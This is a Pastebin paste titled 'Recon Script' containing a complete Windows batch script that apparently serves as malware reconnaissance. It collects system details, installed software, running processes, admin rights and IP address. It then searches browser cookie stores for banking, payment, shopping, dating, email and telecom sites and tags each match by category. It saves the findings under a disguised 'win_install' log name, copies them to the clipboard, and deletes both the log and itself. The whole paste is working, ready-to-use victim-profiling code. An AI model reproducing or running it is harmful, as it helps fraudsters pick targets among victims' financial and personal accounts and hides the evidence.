Guest User

Recon Script

a guest
Feb 27th, 2020
736
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @echo off
  2.  
  3. setlocal ENABLEEXTENSIONS
  4. set "paymentlist=cookie_check.paypal.com paypal.comcookie_check account.skrill.com westernunion.com neteller.com entropay.com 2checkout.com wepay.com .v.me gopayment.com dwolla.com aib.ie barclaycardus.com capitalone.com chase.com coinbase.com liqpay.com moneybookers.com open24.ie payeer.com paysurfer.com perfectmoney.com suntrust.com wellsfargo.com"
  5. set "shoplist=sears.com overstock.com ebay.comnonsession dell.com amazon.comsession apple.comdssid beacon.walmart.com bestbuy.comcontext_id newegg.coms_per airbnb.com bhphotovideo.com farfetch.com lowes.com officedepot.com qvc.com steampowered.com target.com"
  6. set "datinglist=match.com mysinglefriend.com friendfinder.com jdate.com gay.com christianconnection.com muddymatches.co.uk zoosk.com shaadi.com datingdirect.com lovearts.com amateurmatch.com cupid.com datehookup.com meetic.com meetme.com"
  7. set "otherlist=accounts.google.com mail.live.com login.yahoo.com att.com sprint.com verizonwireless.com vzw.com verizon.com craiglist.org indeed.com sendspace.com swiftunlocks.com ups.com whoer.net fedex.com"
  8.  
  9. echo go > %temp%/win_install.log.txt
  10.  
  11. echo ====start_product==== >> %temp%/win_install.log.txt
  12. REG QUERY "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName >> %temp%/win_install.log.txt
  13. echo ====end_product==== >> %temp%/win_install.log.txt
  14.  
  15. echo ====start_cpuname==== >> %temp%/win_install.log.txt
  16. REG QUERY "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0" /v ProcessorNameString >> %temp%/win_install.log.txt
  17. echo ====end_cpuname==== >> %temp%/win_install.log.txt
  18.  
  19. echo ====start_cpus==== >> %temp%/win_install.log.txt
  20. echo %NUMBER_OF_PROCESSORS% >> %temp%/win_install.log.txt
  21. echo ====end_cpus==== >> %temp%/win_install.log.txt
  22.  
  23. echo ====start_domain==== >> %temp%/win_install.log.txt
  24. echo %USERDOMAIN% >> %temp%/win_install.log.txt
  25. echo ====end_domain==== >> %temp%/win_install.log.txt
  26.  
  27.  
  28. ::get soft list
  29. echo ====start_softlist==== >> %temp%/win_install.log.txt
  30. for /f "skip=4 tokens=*" %%a in ('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"') do (
  31. ::echo %%~na
  32. for /f "tokens=*" %%b in ('REG QUERY "%%a" /v DisplayName 2^>nul') do (
  33. echo %%b>> %temp%/win_install.log.txt
  34. )
  35. )
  36. echo ====end_softlist==== >> %temp%/win_install.log.txt
  37.  
  38. echo ====start_tasklist==== >> %temp%/win_install.log.txt
  39. tasklist >> %temp%/win_install.log.txt
  40. echo ====end_tasklist==== >> %temp%/win_install.log.txt
  41.  
  42.  
  43. echo ====start_admin==== >> %temp%/win_install.log.txt
  44.  
  45. ::check for admin rights
  46. net session >nul 2>&1
  47. if %errorLevel% == 0 (
  48. echo userisadmin >> %temp%/win_install.log.txt
  49. ) else (
  50. echo userisnotadmin >> %temp%/win_install.log.txt
  51. )
  52.  
  53. echo ====end_admin==== >> %temp%/win_install.log.txt
  54.  
  55. echo ====start_ip==== >> %temp%/win_install.log.txt
  56.  
  57. ::now get IPV4 from ipconfig
  58. ipconfig | find "IPv4" >> %temp%/win_install.log.txt
  59.  
  60. echo ====end_ip==== >> %temp%/win_install.log.txt
  61.  
  62. echo ====start_brws==== >> %temp%/win_install.log.txt
  63. IF EXIST "%programfiles(x86)%\Google\Chrome\" (
  64. echo brw_chrome_exist >> %temp%/win_install.log.txt
  65. )
  66. IF EXIST "%programfiles(x86)%\Mozilla Firefox\" (
  67. echo brw_firefox_exist >> %temp%/win_install.log.txt
  68. )
  69. IF EXIST "%programfiles%\Google\Chrome\" (
  70. echo brw_chrome_exist >> %temp%/win_install.log.txt
  71. )
  72. IF EXIST "%programfiles%\Mozilla Firefox\" (
  73. echo brw_firefox_exist >> %temp%/win_install.log.txt
  74. )
  75. echo ====end_brws==== >> %temp%/win_install.log.txt
  76.  
  77. echo ====start_src==== >> %temp%/win_install.log.txt
  78.  
  79. ::check if ie
  80. IF EXIST %appdata%\Microsoft\Windows\Cookies (
  81. echo browser: ie yes >> %temp%/win_install.log.txt
  82.  
  83. cd /d %appdata%\Microsoft\Windows\Cookies
  84.  
  85. for %%i in (%paymentlist%) do (
  86. findstr /m %%i *>nul
  87. if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
  88. )
  89.  
  90. ::search shops
  91. for %%i in (%shoplist%) do (
  92. findstr /m %%i *>nul
  93. if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
  94. )
  95.  
  96. ::search dating
  97. for %%i in (%datinglist%) do (
  98. findstr /m %%i *>nul
  99. if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
  100. )
  101.  
  102. ::search others
  103. for %%i in (%otherlist%) do (
  104. findstr /m %%i *>nul
  105. if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
  106. )
  107.  
  108. IF EXIST %appdata%\Microsoft\Windows\Cookies\Low (
  109.  
  110. cd /d %appdata%\Microsoft\Windows\Cookies\Low
  111.  
  112. for %%i in (%paymentlist%) do (
  113. findstr /m %%i *>nul
  114. if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
  115. )
  116.  
  117. ::search shops
  118. for %%i in (%shoplist%) do (
  119. findstr /m %%i *>nul
  120. if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
  121. )
  122.  
  123. ::search dating
  124. for %%i in (%datinglist%) do (
  125. findstr /m %%i *>nul
  126. if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
  127. )
  128.  
  129. ::search others
  130. for %%i in (%otherlist%) do (
  131. findstr /m %%i *>nul
  132. if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
  133. )
  134.  
  135. )
  136.  
  137.  
  138. )
  139.  
  140. ::check if ie in win 8,8.1,10
  141. IF EXIST %localappdata%\Microsoft\Windows\INetCookies (
  142.  
  143. cd /d %localappdata%\Microsoft\Windows\INetCookies
  144.  
  145. for %%i in (%paymentlist%) do (
  146. findstr /m %%i *>nul
  147. if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
  148. )
  149.  
  150. ::search shops
  151. for %%i in (%shoplist%) do (
  152. findstr /m %%i *>nul
  153. if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
  154. )
  155.  
  156. ::search dating
  157. for %%i in (%datinglist%) do (
  158. findstr /m %%i *>nul
  159. if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
  160. )
  161.  
  162. ::search others
  163. for %%i in (%otherlist%) do (
  164. findstr /m %%i *>nul
  165. if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
  166. )
  167.  
  168.  
  169. )
  170.  
  171. ::check if firefox installed
  172. IF EXIST %appdata%\Mozilla\Firefox (
  173.  
  174. cd /d %appdata%\Mozilla\Firefox\Profiles
  175.  
  176. for /d %%F in (*) do cd /d "%%F"
  177.  
  178. IF EXIST cookies.sqlite (
  179. ::search payments
  180. for %%i in (%paymentlist%) do (
  181. findstr /m %%i cookies.sqlite>nul
  182. if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
  183. )
  184.  
  185. ::search shops
  186. for %%i in (%shoplist%) do (
  187. findstr /m %%i cookies.sqlite>nul
  188. if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
  189. )
  190.  
  191. ::search dating
  192. for %%i in (%datinglist%) do (
  193. findstr /m %%i cookies.sqlite>nul
  194. if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
  195. )
  196.  
  197. ::search others
  198. for %%i in (%otherlist%) do (
  199. findstr /m %%i cookies.sqlite>nul
  200. if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
  201. )
  202. )
  203.  
  204. )
  205.  
  206. ::check if chrome installed
  207. IF EXIST %localappdata%\Google\Chrome\User Data\Default (
  208.  
  209. cd /d %localappdata%\Google\Chrome\User Data\Default
  210.  
  211. IF EXIST Cookies (
  212. ::search payments
  213. for %%i in (%paymentlist%) do (
  214. findstr /m %%i Cookies>nul
  215. if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
  216. )
  217.  
  218. ::search shops
  219. for %%i in (%shoplist%) do (
  220. findstr /m %%i Cookies>nul
  221. if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
  222. )
  223.  
  224. ::search dating
  225. for %%i in (%datinglist%) do (
  226. findstr /m %%i Cookies>nul
  227. if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
  228. )
  229.  
  230. ::search others
  231. for %%i in (%otherlist%) do (
  232. findstr /m %%i Cookies>nul
  233. if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
  234. )
  235. )
  236.  
  237.  
  238.  
  239. )
  240.  
  241. echo ====end_src==== >> %temp%/win_install.log.txt
  242.  
  243. ::notepad %temp%/win_install.log.txt
  244.  
  245. cd /d %temp%
  246. TYPE win_install.log.txt | clip
  247. del win_install.log.txt
  248.  
  249.  
  250. ::echo Please press enter to exit and delete file
  251.  
  252. ::pause >nul
  253.  
  254.  
  255. DEL "%~f0"
RAW Paste Data